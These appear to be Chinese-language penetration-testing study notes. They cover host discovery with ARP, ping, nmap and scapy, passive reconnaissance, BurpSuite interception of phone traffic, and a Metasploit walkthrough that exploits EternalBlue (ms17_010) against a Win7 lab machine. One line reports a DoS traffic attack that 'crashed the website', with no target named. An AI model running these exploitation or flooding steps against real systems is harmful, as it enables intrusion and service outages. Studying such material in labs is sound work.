桥接相当于虚拟机和物理鸡在同一个网络
快捷键
Ctrl+shift+‘+’ 放大字体
Ctrl+‘-’ 缩小字体
Ctrl+shift+T 打开新终端
Windows
type 1.txt 查看文件内容(cat)
md 123 创建文件夹(mkdir)
copy 1.txt 2.txt 复制文件
xcopy 123 1234 复制文件夹
ren 1.txt 2.txt 重命名
rd 123 删除目录(提示不为空)
rd 123 /S 删除目录
del 1.txt 删除文件
nslookup 查看域名服务器
ipconfig [/all] IP
tasklist [/V详细] 当前进程
taskkill [/F强制] /PID 号 杀死进程
net user [name] 用户
ipconfig /displaydns DNS缓存
ipconfig /flushdns 清空缓存
命令
pstree 进程树
主动信息搜集
二层发现
在以太网中,数据传输的目标地址是MAC地址,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。
计算机使用者通常只道目标机器的P信息,“地址解析”就是主机在发送帧前将目标P地址转换成目标MAC地址的过程。
简单地说,ARP协议主要负责将局域网中的32为P地址转换为对应的48位物理地址,即网卡的MAC地址,保障通信顺利尽行。

Netdiscover网络扫描工具_测试开发小记的博客-CSDN博客
三层发现
ping
traceroute命令可以对路由进行跟踪
traceroute ke.qq.com
dos流量攻击
![]()
有效,网站干崩了
fping
fping就是ping命令的加强版他可以对一个IP段进行ping扫描,而ping命令本身是不可以对网
段进行扫描的。
四层发现
Nmap的常用命令和高级用法_nmap命令_内网漫游-网安人的梦的博客-CSDN博客
scapy
定制ARP包
定制ping包
定制TCP的SYN包
目标资产信息搜集—被动
主动信息搜集:与目标主机进行直接交互,从而拿到目标信息,缺点是会记录自己的操作信息。比如:nmap端口扫描,scapy高级扫描等。
被动信息搜集:不与目标主机进行直接交互,通过搜索引擎或者社会工程等方式间接的获取目标主机的信息。比如:google搜索,Shodan搜索,fofa搜索,钟馗之眼等。
wireshark
wireshark使用_Int mian[]的博客-CSDN博客
Nmap
Nmap使用教程图文教程(超详细)_士别三日wyx的博客-CSDN博客
man namp
man+XXX 查看XXX操作手册
nmap -v 192.168.0.250 // 扫描我的物理机
zenmap
打不开解决
Kali Linux安装zenmap报错解决_libffi7_永远是少年啊的博客-CSDN博客
关于kali Linux工具打开提示SyntaxError: invalid syntax_Parle的博客-CSDN博客
使用

BurpSuite抓手机包
导出证书文件,想办法整到手机上安装
手机wifi设置代理
抓到了
msf攻击永恒之蓝
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了
😉打开msf
┌──(root㉿MyKali)-[~]
└─# msfconsole
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.3.31-dev ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1387 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Start commands with a space to avoid saving
them to history
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
😉看永恒之蓝相关模块search ms17_010
Interact with a module by name or index. For example info 3, use 3
or use auxiliary/scanner/smb/smb_ms17_010
😉use 3使用探测漏洞的模块,options查看参数
set RHOSTS win7ip
run
😉use 0使用0号爆破的模块,options查看参数
😉去msdn下一个win7靶机,设置在同一个局域网
😉set RHOST (win7的ip
😉run
😉
信息收集
子域名收集
谷歌语法:
https://www.cnblogs.com/wwcdg/p/15913895.html
site:xx.com
fofa:
证书查询